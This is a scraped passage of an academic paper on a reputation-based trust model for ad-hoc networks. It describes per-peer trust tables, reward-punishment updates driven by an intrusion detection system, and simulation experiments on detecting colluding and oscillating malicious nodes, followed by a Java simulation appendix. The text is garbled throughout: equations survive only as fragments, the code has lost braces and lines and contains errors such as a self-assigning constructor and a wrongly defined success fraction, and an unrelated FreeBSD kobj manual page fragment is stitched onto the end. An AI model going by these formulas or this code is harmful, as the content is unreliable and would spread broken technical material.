which need some kind of polymorphism (i.e., many different objects which can be treated in a uniform way). The common behaviour of the objects is described by a suitable interface and each different type of object is implemented by a suitable class. The simplest way to create a kernel object is to call kobj_create() with a suitable class, malloc type and flags (see malloc(9) for a description of the malloc type and flags). This will allocate memory for the object based on the object size specified by the class and initialise it by zeroing the memory and installing a pointer to the class’ method dispatch table. Objects created in this way should be freed by calling kobj_delete(). Clients which would like to manage the allocation of memory themselves should call kobj_init() with a pointer to the memory for the object and the class which implements it. It is also possible to use kobj_init() to change the class for an object. This should be done with care as the classes must agree on the layout of the object. The device framework uses this feature to associate drivers with devices. The functions kobj_class_compile(), kobj_class_compile_static() and kobj_class_free() are used to process a class description to make method dispatching efficient. A client should not normally need to call these since a class will automatically be compiled the first time it is used. If a class is to be used before malloc(9) is initialised, then kobj_class_compile_static() should be called with the class and a pointer to a statically allocated kobj_ops structure before the class is used to initialise any objects. To define a class, first define a simple array of kobj_method_t. Each method which the class implements should be entered into the table using the macro KOBJMETHOD() which takes the name of the method (including its interface) and a pointer to a function which implements it. The table should be terminated with two zeros. The macro DEFINE_CLASS() can then be used to initialise a kobj_class_t structure. The size argument to DEFINE_CLASS() specifies how much memory should be allocated for each object. HISTORY Some of the concepts for this interface appeared in the device framework used for the alpha port of FreeBSD 3.0 and more widely in FreeBSD 4.0. AUTHORS This manual page was written by Doug Rabson.
http://manpages.ubuntu.com/manpages/intrepid/man9/kobj_class_free.9freebsd.html
CC-MAIN-2013-48
refinedweb
565
50.87
Opened 6 years ago Closed 6 years ago Last modified 6 years ago #17953 closed Cleanup/optimization (invalid) DB architecture in tutorial Description Hi, on page: you create DB architecture by this code: from django.db import models class Poll(models.Model): question = models.CharField(max_length=200) pub_date = models.DateTimeField('date published') class Choice(models.Model): poll = models.ForeignKey(Poll) choice = models.CharField(max_length=200) votes = models.IntegerField() and I think in clean architecture it should be: from django.db import models class Poll(models.Model): question = models.CharField(max_length=200) pub_date = models.DateTimeField('date published') class Choice(models.Model): choice = models.CharField(max_length=200) votes = models.IntegerField() class ChoiceToPollRelation(models.Model): poll = models.ForeignKey(Poll) choice = models.ForeignKey(Choice) In this way, you are leading beginners to do errors from start. Change History (2) comment:1 Changed 6 years ago by comment:2 Changed 6 years ago by Thanks for quick reply. Perhaps I've been too quick to open the ticket and my "statements" (you are leading beginners... and so) were offensive. Sorry. It should have been humble question. ;-) I have to think about it more to make it clean to myself. Thak you once more. There's nothing wrong with a foreign key; it reflects that each choice can be related to one and exactly one poll (a one-to-many relationship). Your proposal is to change it to a many-to-many relationship, which is also fine if you need a single choice to be able to appear in multiple polls, but it's not better or cleaner (in fact it's worse if you want to enforce the one-to-many nature of the relationship). If we were to use a many-to-many relationship here, the correct way to do that in Django would be to use a ManyToManyField, not a separate join model (given that there's no extra data about the relationship being stored). But there's no reason to complicate the tutorial by using a ManyToManyFieldwhen a ForeignKeymeets the need.
https://code.djangoproject.com/ticket/17953
CC-MAIN-2018-34
refinedweb
339
61.43
Redis is blazing fast and can easily handle hundreds of thousands to millions of operations per second (of course, YMMV depending on your setup), but there are cases in which you may feel that it is underperforming. This slowness of operations – or latency – can be caused by a variety of things, but once you’ve ruled out the usual suspects (i.e. the server’s hardware/virtualware, storage and network) you should also examine your Redis settings to see what can be optimized. A good place to start is by verifying that the CPU load of your Redis server is indeed working at full throttle and not blocked somehow. If your Redis process is at a stable 100%, then your issue may be attributed to one or both of two things: your volume of queries and/or slow queries. The optimization of slow running queries (and in most cases the underlying data structures) is an art in itself, but there are still quite a few things that you can try before tryin other measures like upgrading your hardware or clustering Redis. Review your Redis’ SLOWLOG to ensure that there aren’t any particularly slow queries in it – these should be easily identifiable by their high execution times (the third integer in each log entry). Higher execution times mean higher latency, but remember that some of Redis’ commands (such as Sorted Set operations) can take longer to complete, depending on their arguments and the size of data that they process. By using Redis Cloud’s enhanced version of the SLOWLOG or doing the math in your head, you can further drill down to identify the troublemakers. Next, take a look at the output of the INFO ALL command. Use your experience, keen judgment and cold logic to answer this question – does anything look weird? 🙂 When not tracking persistent storage, networking or replication bottlenecks, you should focus on the stats and commandstats sections. When the value of your total_connections_received in the stats section is absurdly high, it usually means that your application is opening and closing a connection for every request it makes. Opening a connection is an expensive operation that adds to both client and server latency. To rectify this, consult your Redis client’s documentation and configure it to use persistent connections. Use the information in the commandstats section to hone in on the commands that occupy most of your server’s resources. Look for easy kills by replacing commands with their variadic counterparts. Some of Redis’ commands (e.g. GET, SET, HGET & HSET) sport a variadic version (i.e. MGET, MSET, HMGET & HMSET, respectively), whereas others have infinite arity built right into them (DEL, HDEL, LPUSH, SADD, ZADD, etc). By replacing multiple calls to the same command with a single call, you’ll be shaving off precious microseconds, while saving on both server and client resources. If you’re managing big data structures in your Redis database and you’re fetching all their content (using HGETALL, SMEMBERS or ZRANGE, for example), consider using the respective SCAN command instead. SCAN iterates through the Redis keys’ namespace and should always be used instead of the “evil” KEYS command. As an added bonus, SCAN’s variants for Hashes, Sets and Sorted Sets (HSCAN, SSCAN and ZSCAN) can also help you free up Redis just enough to reduce overall latencies. Another way to reduce the latency of Redis queries is by using pipelining. When you pipeline a group of operations, they are sent in a single batch that, while bigger and slower to process, requires only a single request-response round trip. This consolidation of trips makes for substantial overall latency reductions. Note, however, that a pipeline operation could block your application if it is waiting for replies without sending the pipeline – Redis will provide all of the replies to the pipelined stream of commands only after the pipeline has been sent. Also bear in mind that when using pipelining, Redis caches all the responses in memory before returning them to the client in bulk, so pipelining thousands of queries (especially those that return a large amount of data) can be taxing to both the server and client. If that is the case, use smaller pipeline sizes. When pipelining isn’t an option, you can still save big time on round-trip time (RTT) latency by taking the “moonlit” scripting road. With Lua scripting in Redis, you can use logic that interacts with the data locally, thus saving many potential client-server round trips. To further reduce bandwidth consumption, latency, and to avoid script recompilations, make sure to use SCRIPT LOAD and EVALSHA. Lua Tips: Refrain from generating dynamic scripts, which can cause your Lua cache to grow and get out of control. If you have to use dynamic scripting, then just use plain EVAL, as there’s no point in loading them first. Also, remember to track your Lua memory consumption and flush the cache periodically with a SCRIPT FLUSH. Also, do not hardcode and/or programmatically generate key names in your Lua scripts, because doing so will render them useless in a clustered Redis setup. These are just some of the ways that you can easily get more out of your Redis database without bringing in the heavy artillery. Adopting even one of these suggestions can make a world of difference and lower your latency substantially. Know more tricks of the trade? Have any questions or feedback? Feel free to shout at me, I’m highly available 🙂 By continuing to use this site, you consent to our updated privacy agreement. You can change your cookie settings at any time but parts of our site will not function correctly without them.
https://redis.com/blog/redis-running-slowly-heres-what-you-can-do-about-it/
CC-MAIN-2022-27
refinedweb
949
58.01
Introduction This is a GPRS / GSM Arduino expansion board developed by Keyes. It is a shield module with frequency of EGSM 900MHz / DCS 1800MHz and GSM850 MHz / PCS 1900MHz, integrated with GPRS, DTMF and other functions. It supports DTMF, when the DTMF function is enabled, you can get the character feedback from the conversion of button pressed down during the call, which can be used for remote control. It is controlled by the AT command, you can directly start its function through the computer serial port and Arduino motherboard. The SIM800C GPRS Shield board has a built-in SIM800H chip with good stability. Specification - Power Supply<Vin>:6-12V - Low power consumption mode: current is 0.7mA in sleep mode - Low battery consumption (100mA @ 7V-GSM mode) - GSM 850/900/1800/1900MHz - GPRS multi-slot class 1 ~ 12 - GPRS mobile station class B - GSM phase 2/2 + standard - Class 4 (2 W @ 850/900 MHz) - Class 1 (1 W @ 1800 / 1900MHz) - Controlled via AT command - USB /Arduino control switch - Adaption of serial baud rate - Support DTMF - LED indicator can display power supply status, network status and operating mode Sample Code #include <sim800cmd.h> //initialize the library instance //fundebug is an application callback function,when someon;");//input the dial telephone number while(1); } digitalWrite(13,HIGH);//turn the LED on by making the voltage HIGH delay(500); digitalWrite(13,LOW);//turn the LED off by making the voltage LOW delay(500); } //application callback function void fundebug(void) { } Note As for arduino IDE 1.0 and subsequent versions, WProgram.h has been renamed Arduino.h, so this program requires arduino IDE 1.0 or later, overwrite the original file.If it is higher than 1.5.5 version, cut the HardwareSerial.h file into Arduino\hardware\arduino\sam\cores\ arduino,overwrite higher than 1.5.5 version, then open HardwareSerial.h file, doing the same modification. Test Result Burning the code on the keyestudio UNO R3 development board, stack the expansion board on the Keyestudio UNO R3 development board, then connect the phone card (only 2G network) and headphone to the expansion. Powered-on, it can dial phone number15912345678, and you can make a call through the headset after telephone connected. Related Data Link Get the Libraries of Hardware Get the Libraries of SIM800C
https://www.arduinoposlovensky.sk/produkty/arduino/shield/sim800c-gprs-gsm-shield-for-arduino-uno-r3-and-mega2560/
CC-MAIN-2018-17
refinedweb
382
54.22
TypeError: unsupported operand type(s) for %: 'range' and 'int' unsupported operand type(s) for 'nonetype' and 'int' python unsupported operand type(s) for ^ 'float' and 'int' unsupported operand type(s) for / 'str' and 'float' typeerror: unsupported operand type(s) for +: 'int' and 'str pyspark unsupported operand type(s) for 'nonetype' and 'str' typeerror: unsupported operand type(s) for &: 'str' and 'bool' unsupported operand type(s) for / 'str' and 'int' seaborn Write a Python program to find numbers between 120 and 200 which are divisible by 7 and multiples of 5 without using a "for loop". I tried to work it out this way... x = range(120, 200) if x % 7 == 0 and x % 5 == 0: print(x) But rather I do get this error. What could I be missing out? Traceback (most recent call last): File "C:\Users\User\Desktop\skillshare-code\if else statements\4.py", line 11, in <module> if x % 7 == 0 and x % 5 == 0: TypeError: unsupported operand type(s) for %: 'range' and 'int' Since you're not allowed to use the for construct, you can accomplish this with the filter method: valid_nums = filter(lambda x: x % 35 == 0, range(120, 200)) Note that the problem is not asking you to print the numbers but rather "find" them which means to create some form of list or collection of the valid values PS: I did x % 35 == 0 because "divisble by" and "multiples of" means the same thing and so 35 is from 7*5. PPS: filter returns a filter object which is a generator. You will need to convert that to a list if you want to view the list by doing list(valid_nums). You don't need to do the conversion if you just need to iterate through the values and use them for something else since the generator will work just fine for that TypeError: unsupported operand type(s) for +: 'int', TypeError: unsupported operand type(s) for +: 'int' and 'str' (5 + "a")? how do i fix the mistake? errors.py. print("Hello") print("name") print("hello") Teams. Q&A for Work. Stack Overflow for Teams is a private, secure spot for you and your coworkers to find and share information. TypeError: unsupported operand type(s) for +=: 'int' and 'str', TypeError: unsupported operand type(s) for +=: 'int' and 'str'. The code is lovely_loveseat_description = 'text' lovely_loveseat_price = 254.00 For future reference Python is strongly typed. Unlike other dynamic languages, it will not automagically cast objects from one type or the other (say from str to int) so you must do this yourself. You'll like that in the long-run, trust me! improve this answer. answered Mar 4 '10 at 2:46. 62 silver badges. 84 bronze badges. I think using a list comprehension is more idiomatic for Python than filter (of course if you are allowed). x = range(120, 200) valid_nums = [num for num in x if num % 35 == 0] Or at creation: valid_nums = [num for num in range(120, 200) if num % 35 == 0] Why?? TypeError: unsupported operand type(s) for /: 'NoneType , Why?? TypeError: unsupported operand type(s) for /: 'NoneType' and 'int' TypeError: unsupported operand type(s) for -: 'list' and 'int' Hey, @William For me the code is working READ MORE. answered Mar 11 in Python by Roshni What you are trying to do is define x as a range of numbers but that will make x a list of numbers and you will still have to go through every number to check it. Since "for loop" is not allowed, you can use a while loop or call a function recursively starting from lower limit till the passable parameter hits upper limit. def func(x): if (condition satisfied): print(x) if x<upper_limit: func(x+1) return Python error: unsupported operand type(s) for -: 'str' and 'str , print(b-a) Traceback (most recent call last): File "<stdin>", line 1, in <module> TypeError: unsupported operand type(s) for -: 'str' and 'str' >>>. what can i do to divide pyc by tpy? In python 3, the input () function returns a string. This is a change from Python 2; the raw_input () function was renamed to input (). Or, potentially, floats or decimal.Decimals as appropriate, if you need to accept numbers that are not whole integers. – Gareth Latty Mar 5 '13 at 22:54. One of my reading the challenge was to find all the numbers in a range that were divisible by 7 but not by five. That's very different from simply reducing the problem to x % 35. Still, creating a list comprehension was the answer. Here is what worked for me: x = range(2000, 3201) num = [n for n in x if n % 7 == 0 and n % 5 != 0] Once this is done, simply print(num) and you have your answers. TypeError: unsupported operand type(s) for -: 'str', New to coding - Python error: TypeError: unsupported operand type(s) for -: 'str' and. zer0 Offline Programmer named Tim *. Posts: 5. Threads: Lost your password? Please enter your email address. You will receive a link and will create a new password via email. TypeError: unsupported operand type(s) for /: 'str' and 'str', You can divide pyc by tpy by turning them into integers instead: percent = (int(pyc) / int(tpy)) * 100;. For python3 the input() function always print("5" + "a") In the first example we are printing the result of adding two integers. In the second example we are printing the result of concatenating two strings. Hope this helps! on Jul 12, 2016. You are attempting to add together two different data types - python gets grumpy when we try to do this. So to get around this you can TypeError- unsupported operand type(s) for +- 'int', TypeError: unsupported operand type(s) for +: 'int' and 'str' Python is strongly typed, which means that if you try to do an undefined operation, such as Unsupported operand type(s) for /: 'int' and 'NoneType' I had this code working fine a couple of days ago, but all of a sudden it has stopped working. I keep getting type errors concerning my attempt to append data to data1. TypeError: unsupported operand type(s) for +: 'int' and 'str' in Python , TypeError: unsupported operand type(s) for +: 'int' and 'str' in Python. For python, the plus “+” is used to add two numbers as well as two strings. In this instance, this is almost certainly Debian/Ubuntu's problem and not ours: you appear to be using Debian/Ubuntu's packages. That means you need to follow up with Debian/Ubuntu in the first case, as they maintain several patches and are responsible for supporting those packages in their system. - You need to loop through all the values in xbut you're not allowed to use the forconstruct - "What could I be missing out?" %only works on single numbers, you're trying to use it on a range of numbers. - Most operations don't automatically loop themselves if you give them an iterable object. - "which are divisible by 7 and multiples of 5": your teacher has a sense of humour (and mindscrew :)) - @Jean-FrançoisFabre I was staring at that for so long thinking, does he just mean 35? haha - that's probably what the (evil) teacher had in mind. You could explain the 35, and also note that filterneeds to be iterated upon (wrapping it to listfor instance) in python 3 else it just returns a generator. - but it uses a forloop inside the list comprehension. - @Jean-FrançoisFabre Not a Python for loop. Internally filter also uses loop.
http://thetopsites.net/article/50432564.shtml
CC-MAIN-2020-45
refinedweb
1,251
70.33
LATEST CALLED SUGAR CITATIONS . . .. .; , r. ;. a , ' ' : ', Pel.. .IS ! I t tr v four h'uns' tn'.nf U, .' I. ."' ""'.;. Oont) Dollar M Centrifugal M. Tr rlb. r ton J i ries, uswsiisa Dini o.uue ,uu.ui Last prvloa ,uot , i. , tie, . . . . . . : t, . $mo 7'V. U c ' Vm-, H-iu,1 y , fAj t( ' ' V HONOLULU, HAWAII TERRITORY. -TUKSDAV?. FEBRUARY 19.M918. f ASEMI-WEEKLY. Whole number,- 4714 - - - - - t . Yor.. lii.ko. ' i j i 1 - i i ir i i . .S'.:-' .t. " "in i ' fa, itii.UL.li it)!) I I Bloody Internecine , Strife Goes Steadily Forward and Streets ! .' of Several v Cities Run . Deep :Twith Blood of Countrymen X POLISH F0RCis!ROUTED v b , HIN MINSK. ENGAGEMENT .' ,;' '!,( t . .-. '. , . v , i Bolshevik Leaders Continue. Their r Plans- To Secure Control of All-Russia Even Jf It ?e Lost Later To Huns- r 5,-0 ' : ! f NON DO N, ; February" A 8- JL sociatcd .Jfress) Bolshevik leaders despite' the resumption of war by- Germany, appear td beMi- greeting their attention to internal t cjipoTder and' to be pushing' for ; ward their intention to' hold sway '"over 'All-Russia. ; even though .' it may be taken from thttrf by the v Prussia! invaders, who JttVe.' aK , ready crossed the Dvina. Ignor iiig danger from- without they re i pre;ssing- forwr'deper into ch'il r .warfareuivlff.rtf1 ""rtf H "Russfais'riven deeply Vitl ejvil nil! OF I DERS chaotic and interpeefhe slaughter 'W rh prevalcntr 'S-:XX'-f-.'L? J ': - ; -6les routed '- -v v ; Despatched frojm jpetrograd U.tf ; last night told bf , Beveredefeat fvminjsteVed.byrtlie.? Bolshevik , fbrcej' against those tit h Polish !, h anti-reV6Iutionist ( t ion he'ajr o' Afinsk.' 'There: the' sixth : Polish .h) At my' fyision'was' defeated with j .' heavy 'casualties."-' It is taid 6ne detachment if the'Crolislt wrcea :'-J J was completely' annihilated. i The national '.council with' Le y, nine at its head has given orders ; " to Bolshevik commanders to'aeite ( . a number' of cities 'and to quell ' opposition to' the rule of the couii ;C cil. ' The "result lias been bloody h k street fight! in. these, cities and 5 rUheir rsuburbi J and n some" in- 'stanees' severe engagements' in ' 'the open 'untryfpetrogr'ad're- ports are. almost entirely of Bol '; ' ' iJie vik successe)t4. ', ''' i,v '.'i.'4''- V.;;;;;kietaken:;:; f OFrom Kiev itwas reported that . after eight days; pf.hard fighting - : the Bolshevik; troops nlve uc- ." ceeded in capturing that city." A regular siegn wa'! laid by the ' iattackers, aft whie besieging he ..city-hVfcoUhevik'aviably'drop - ped many bombs wpqrt.tnemhabr i. n tants. . ., . ' , , v V, ?i The casualtiti ate estimated at , 4000 killed. nd i 7000 - wounded. . f Dead by: th'e hundreds still lill ' the ;i streets','1 rrtany fiomtn? and ? ' children having beea alaln, ' -tl. :, A' battle ;inOdess4 took, place Vn Monday between .the Bolshe , viki supporters" and ' tie' "moder ates", most of whom,, particular ly outside PetrogridrrtUi. decline to recognize dhe 1 Bolshevik" re- gime.' '. ; v: v . ' -. RT h e Bblnlieviki -boinbarded Odessa and great damage..' In some districts the poles have defeated the" Bplshevikf and kill ed large numbers. Other Poles are advancing against Smolensk, now held by a Bolshevik garri- aon. SCHROEDEB. IS SENTENCED; TO : Confessed Conspirator Escspes Term n Penitentiary As Result ,cf His Having Turned States Evidence.. AoalnsV- Co-Defend- , ants .j, .v-,v' 4' v? -f. v , t '.. V v. mi -i i , ;t.- - ;i .. In- eeaiilral f , tk- fnc that lleiiiricll - Attfroftt J 8ekroi'r ' tiirnrd 1tU Jvl.U.'Kain(it kii fallow ro. lrtor tnd told the Jury nkicfc i it tint; i th jiHidU- Itrvolutiea Com' plny Cm4' wkat I Tiiifiir about tka oiip(rany ,'aHd ilia , tart. ( which ,'he, Omng podik and. otker plard la Ha' waiHn thKnapIrary, k kaa btva pr- it ted. bv a fHWa Jmtj t ffp with a'otbr paalt.T thaa til inconne quptiaf fiaa mf 10(M). , .No priMO a tenc waa Imftoaril po' him. " Am eitt ITWa .'drapatehoa'i'rivad; lat KiKht' "oaM: ' hralr' aratflupd. Oa tliAUwnd dollar ' , . i Coaidrlnt ' tkfl fart ' kat , Oorcr Rodirk, kia taparlot,-waa fiood 10,ff)O and rtlno rarM4 priao aatcne, tha pnlt.r inflicted apon . rVhrodrr may m roinmbura, and It may l that tk judge ennidred 8hrodar anility a aa urn ploy aad aot aa a prinvipal,,. Owsptrrey Charg4 . .- Hoiartok An runt $chrodrr. formar alerk af H.'Harkfeld Co, during taa Rodjek ragima nd anteeaaor to Rodiok a reprfnentatiTa af,, Oarmaay kere aftr tka raai)raattoaof tka )attar on February ft, IBIS, waa indicted with Ro.lik nd forty other oa etar of toaRpiraey to violata tkf afutrality of tha raited Htataa. the apaeifia aceUaa- (ion being that tka defeadanta con Kpird to foment aa. oplung agaUxt Britian mla in India' for tha purpoae Of emliarraaainjf Ike Brltinh . ttovernmeBt rope. Ma all. ninety-eight indictment were returned, but fifty aix defendadte weM ..beyond the ; war k k af , United State authoritle. f . t: tj. ' Surrender Hlmaolf , i ' Vi hXtrotd mt th"iidWnra So-T diek ehredr reaekett Hoanluliv it mtmHotM much eteit..n inf.At'JJ14 fima' ef the Indictment lUidiek wai n hia way t tka Caairt but Rnhroeder ia ktfnp He wainot larreated ai tk time, bat following ' tka .pnbiication in. The Adrertlaer on Jnly 2 that an order or kia arrect kad been leaned by federal oftlHuN in Hn Tra'nolaco, and order led been aant to the federal nuttlorltiea hare tr arretit bin and aead bit to San Pranciaeo for trial aa boob bit might be, be engendering hiataelf at tea 'loek that moraipg and waa held in 110,000 ball, the aaae araouOt that Bodlek far. iehed; U , euri in Ftaneiaeo. It deeelAfied the reaaon no warraat had been arrvad on Kehrteder wa the mee aage from. Ran frakelaan dlreeting the arrest or 'Jt-'P.r Sehrooder, and the delay waa lo aenre4 more explicit in atntrfioaa.' . ' - , Rehtoeder left here for Bin tVaaeUeo to Hand trial oa Aogvet 9, aad an An gnutt.87 the trial of the German reeenr Ut wal net for Oetober 80. The trial of thirty aevea of the defeadaat did not tart, however; natU Norember SO. The indletmentt again flea of the arlglnal forty two were diamiaaea. " Plead OuUtjr i 1 .-"' It wu on Peeekber 5 the big eur pri eme when Bodielf ad Rehroedr pleaded gnilty, at the eame time mak ing atatem4iti te the proeeeqtor in ex tenuation of-, the, offences with whtr.h they were charged. At that time United 6t8t Attorney Preston Intimated he would recommend that the eonrt gie toasideration the atatementa of the two' defeadanta and extend elemeaty provided they gave Jhe eyidenee re quired of them, .v;"!- V. 'W'i! U,-"'.V.'.-" la their written atatementa to the United ' 8te attorney ; . Rodlek and Sehroeder alaiined. that insofar a their eonneetioa' with the ' Maerltk went the)r effenaea toaelnted merely of har inr fiiraiiihed'nppllea for that veaeet wkiU . he r waa lying at Hilo and par. took only (f the nature of a eommereial traaaaetion.' In , Jiia teatlmony later, however, ttahroeder went further .and told of the chartering of S aampaa to rarrr.rod menaagea and proyiiiioni to the Maverick from Ban Franeiaeo. The tranmiiioa of order through them t the eemmander of the Maver lek oeeurred in April and May, IBIS, and the extenuation plea that' this waa before the United State waa involved ifl the War waa presented ; '. !. ' They' ariced the acceptance of their Ma:temnt a' the spirit of fairne to themaelre and to their American friends In ' Honolulu. ' Rpeaking 'for Hehroeder. a well ae blmself. Kodiek aliened that When the war broke out In 1914 he re advised by counsel that it waa not Incontdstent for b.im if act as German eonsuU: Whatever they did, he elifimcd, wni purely eommereial in na-l0re.;:-v. -v..,'.. . v.' M . Oa necemher $3 Rodiek wnK aentcH fed to pay a fine of 10,000 the touft giving Its, reason' at the lime for the fine.Snd no prison sentence; At that time sentence opon. rchroeder waa de ferred and rem time to -time da beitn poatponed nntU yealerday. ) ) " ronetit Correct ...; J-y . Keporta from Ban Frepelsc received January I last . said the former. HoaV lulan might, tarn - state evident ' U avoid a. penitentiary eentene. , t fiii ' (Pan tin n4 oa Pag X Culnmn i)x I1. 1 '. 1 . . ' ' 1 " .' . 1 - . '. ' . . 11 '.'I.-. -Ij .lf '':.' ! '.' f. 'I ...... HEINRICH AUGUST SCHROEDER. GEiML SIBLEY'S : CAREER IS ENDED mander In Philippines Passes ; Avyay,MXamp Grants yr" Atwv, J Wd rearoary IB Aaaothifrd lriuiwnri. Cir Treder- XifV (:Ai-t. V. :1L. VftirVil: lkiir:d' Cm)u. -,!. wtirn aftlie, rwiliriuin emptv died at Cixjnp Crant yenter day from r.ernicioiia aenemia. JIc had been taken W tbe.base honpital week ago, rhni'th .Maj'o RanitarVm, whore h .had been undergoing treatment , 'Genet! .' HihleC waa eilty alx years old, a native of Trias. Hi father-was Oeni C, C. Khioy, He wa nsslired to the ekv(ry on graduation from , West I'oint.in serving n-,m utuber of regiments, jsciuom , the . Fourth Cav-. lry,'in whlih he. was, Ueutensuteol Osel ln',1000. :Hewaeoe f,Oeneral Crook 'a pending officer " a.rahmt the 8ionxi and Cheyenne. -being breveWd "for, gallantry in action aftor the battle of tka Little Big Horn, and later for '.'.distinguished- gallantry . In notion egnlest1 .. Craxy Home', ; powder Kiver,-Montana. . . i ;. . Inuring tha waif with Spain ha wi ia command of the headquarter guard f thev Fourth. Army Corps and was later tuljntaat general, of the Pepart went" of Lnxon.. In command at the Second CavalrV ha later aunnreswd the hadrone of .Cavite; and Batancas. From JAOit to 1011 he was commandant of the Military Academy, v General ttibley was the father of Mra. rhalen,.wlfe ot Col. Jarae Phal en, division" aaaitary Inspector of Camn Grant, and pf Mr.v Christian, wife of Colonnl. Christian of rh. Signal Corp Both ilangKtnr aad his. wife war with mra ween ae died.' 4 . i .,: . ) 'i - i' T, Announcement Made In Washing ton That Head of Recent Mis-, rslon Will Be Named "" .; , ' . ' i mm . . : . .;-v'' ' WASHlatONFobrury ' l4-As-sorinted Pre Viscount Ish!, head of the Jspaa; AliplomtUfl . mission which recently visited the UniUd State, will soon represent hl country at Washing ton. .' Announcement ' was mail at -the state department today that Tokio ha officially Informed the i United State that Ixhil hat been appointed nmbaasa dor te the United IBtate. . ' '; :,:. .'.( . Viscount AUuaro Bato, present - ambassador,- will' b placed n the ' un siisignod roll af diploraatia reprtisenta- tives i Tokio; -,-i ISO 0 BE Af CASSADOR visrotini Aiaujiro tsnn . ia oi , years old.. He haijbeen Japan' foreign min ixter and anibssnador to France;. ' His work as head of thp Ishli ' sion is generally regarded aa snpsrh. It was eriticliMd only by the extrem ists in his own-country. vTbe mission was splendidly .-received do' the'l.'nl.td tate and it: work w(tk the atate do partment resulted in , tb now fanvon Ishii '-ansing agreement already , in, op erstton, vhi'lj Is declared to have set tled the.Var JTJHtern' question and brought a better understanding between the Orient and the Occident than ba existed for more than a d:aJ, - . ... ..... t . j,. T-.. .'.; , ,t'.; . ; , ... -r Mexican President Reported Un able To Form Cabinet Treats -Secretly Wijh Rebels fi: liiimhi, Tcx. reorunrv jl3 As- VhfMHtCd JTP i (PMii-incoiiiry tw.form a mm ikinni ea sai i. tt.tm... e.M i.j t iUV if r r rmikks.'ii-iia dr i jsk , tuns iiatmro u t wba;rrfolteil in Pocniulx-t uU Outier rex and 1'rajicieoa Cow are snid to be tw renenaa tor rresident-Carranea's prolonged absence - from Mexico City, which he IcCfDecembfr 27, teoording to trayelr who. 'arrived here. from Mexkg City.. ITiey stated thot when they Wtilae ienrdtal lh negotiations with the., rebels had produced no. re sults and, that Aha president bad giith ered about hint cr Pnr.hoea,. where , he made his "headquarters, . nearly 4000 'troop. -:. '4 ..;' ' , - .. i' . Tiieecnbinet tangle, .'they added, wan eomidiratii by the demand of General l'tiio Qonsnles, who was tiotlcnrtood to have bf a.selerted by the president to hend the, new- eabim a minister of governaciim and .who - is .reported to htve refused to serve unless the Ger man Minister ; . H.; von 'Kckardt weie givn his pa.iport and unless various other men. notably I.ni Cabrera and Safact Kietd, actiair secretary of Ha- cienda,. ba given no voice or place la I ne goverum.'nt. Ueneral Uonxtloe some months ago insned a publia statment in ravnr ol tae entente AUies. GE Two Ruthless Raids Give Casual ; ty Ust of- Sixty-eight; ; Many Children Hurt . i iloNPON, Febrnary 19-1 Associated Prem)--niualtie from the Hun air .raids of . Ratneday and Bunday night proved hen ler than wax at. first re poftfd, Erly reports ' indicated the Osmupe to life nd property on .Ratur dny night was Insinnillcant but full reports .from th other-, rities whieh were attacked by the raiders told a different story and another ..; 'chapter added to the history of German kultur. War office reports of yesterday gave the total, casualties of the - Hntnrday niht raid as eleven killed and four iniured and on Hunday-nibt sixteen killed. ant thirty seven wonnded, a totol for' the Jwo ,raids of twenty seven dead and -forty injured, many, of them women and children.' 'V" .' ' ;', . I.oitites to the enemy fleet re .report ed but the wnr offjee. in It aommunique doe pot give specific details. , . T .1 i ."''' GENERAL ROBERTSON - I, ioNUOK, February lft-( Associated llrsll--(eJural Bobertson,' who retired as", rhief of Ntnff through his resigna tion of that position, has accepted the import Apt .command of .' the British fortes in Eastern Kjiglitnd. While the duties are not suoh , as fall upon the eoninmiider of the battle fronts they are none the Jess important in th gen ral conduct of th war, RiVIANKULTUR IS RAINED ON LONDON BRITISH POLICY NOT DISTURBED THROUGH Announcement of : Admiralty ; Board's, Personnel Sets : At : Rest Much Speculation and Is Without Sensation , l.OMlxiV, TVhriiAry 12-(AaaoriatiJ rea)--ripfenlatlni la eettaia qnar rara a to any diatiirhaara of tha main IIik'k af tlritiali anvnl fliry ha been 'liNdpa'.rd witk the ennuunnricent of th eoi;tti.a f the new bnard of atuiiraU)' .-Uia lift, whlek appeared ia th i,ndm rtaett, u fniio .t i eir.ErlC O. Gaddta. First Zjord. Arttnc Admiral . . ... . n , . I miraj Blr B. ' B.. - . tVemyrw, Fint Sea Lord and Chief , ' Vlf-AdiB.rl Sir H. neath,, Ewrond Faa Iord. , .. .; ... i r-.- - Raar-AdtHral ! tlitotS C. V? Third Sea Lord.: . ... '' .( v f' Raar-Admlrai H. tt'P.' TotWU,'1 fonrUi 8 Lord. :s " ' Atir A&rtrrl S. , rtanustla. ( ' I peooty Chief af Staff. -; , Rear Aoirnl Sir A. L, Puff, , . ; AiHnVBt Chief of Staff. , 1 ' .' Ti. O. Pretyixaa. CirU Ld. - Rear-Admiral O. F. W. Hoca. , !' Pontntr nr Seal Lord." - " V Sir A'aa O. Anderaon, Controller. , n- Arttur T. Paaaa, 8oeoad Cni . Irord, ,. .' .., . .., , fc t , .rv , . "Thw ia, nofhln - KeBaatTonxI ! or orairaTia. iir tne nut or maa,''t.anye taa uniir ., Teirfraph. , "Tha Dally .. Telerrapa. , "Tke tmtent will set K rest any fear that a Violent i chance In the main line of naval pol t i . . A. J loy r soatemplnted. There is only one member nf tit new board wfio was not sen-ing at the sdmirslfy when Si John .iciiteoe wan tn ofliee, and that one ex' ee4inn 1 , Kear-Admiral Sydney :, Fr-matleri-v- r"v .,''' i.;.ti.' WetfwiA.AdvaoM '' H-K&i i"i !,., i "For the .ret, Rir Rowlyn "Wemyss striHt .np, - already nnpnndr from pepnty ' Fimt i flea f iovd -t First trd.'and is soeeeeded by Rear Admb" 0 CAj'ge . Hope,' 'who .ior some . thne ' . . . - . ii.i. t; t - . tJ. Divisiott of the Naval btair. 'in Wbiclt position, be. ss done eoiisupleu aits :rvic. ' ' .-.,': w. ..$ ,i v.-. -. -.. "The second; third,' and fburth-aea lords, " responsible fori personnel, ma terlal and annplie. respectively; retnin their seat,, but the petition of 4fth sea lord revpaitsible fo aerial polic,v, is abolished iff view 'of j the creation of the air council. ... t;. r row Eerviceo '.'v f ; I '; ".It 'mny be recnlled- that the naval member f . )he iormer , board ,who me to Whitehall n year ago nnd still remain bad all - nerved in the irrand j fleet sine, the opening i the war, and that Admiral Fremantle, who belongs to a naval family with .high traditions. Iiaa been employed in n variety .' of i-nheres In the North He, aa well as in Hoot hern waters, and , everywhere with snceese. He rcturas U the admir ilt r with the advantage', .of havinc nerved on the naval staff la tha early dav of the .war. ,' ' . v ...' . ti'f , . "Conseqnently there la nothing In the eouatitntion of the tonr4 to under mine public'. eonSdenea or to anggest that there is any Intention to 